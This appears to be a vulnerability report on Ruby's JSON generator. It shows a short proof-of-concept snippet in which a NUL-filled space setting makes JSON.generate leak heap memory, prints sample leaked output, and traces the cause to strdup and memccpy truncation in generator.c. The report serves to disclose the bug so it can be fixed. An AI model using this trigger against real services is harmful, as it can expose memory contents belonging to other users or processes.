Arbitrary heap exposure in JSON.generate

Running this snippet can expose arbitrary memory: ```ruby require 'json' state = JSON.state.new state.space = "\0" * 1024 puts JSON.generate({a: :b}, state) ``` ``` {"a": psych/handlers/recorder.rb tensi0 reeze) Gem::Specification.new do |s| # to objects of the same type as the original delegate. mydata/scm/git/ruby/dist/lib/ruby/2.5.0/json/ext.rb pass the namP See http://guides.rubygems.org/specification-reference/ for help # # constant and class member data initialization... "b"} ``` The issues lies in using `strdup` in [generator.c](https://github.com/ruby/ruby/blob/trunk/ext/json/generator/generator.c#L1103), which will stop after encountering a NULL byte returning a pointer to zero length string, which is not the length stored in `space_len`. Eventually `fbuffer_append` will copy the length of the string (e.g. the 1024 above) into the generated buffer. Simpler snippets like `JSON.generate({foo: "bar"}, space: "\0" * 1024` suffer the same issue but for slightly different reason; as `fstrndup` is using [memccpy](https://github.com/ruby/ruby/blob/trunk/ext/json/generator/generator.c#L311) which will, again, stop copying after encountering a NULL byte returning a pointer to zero length string.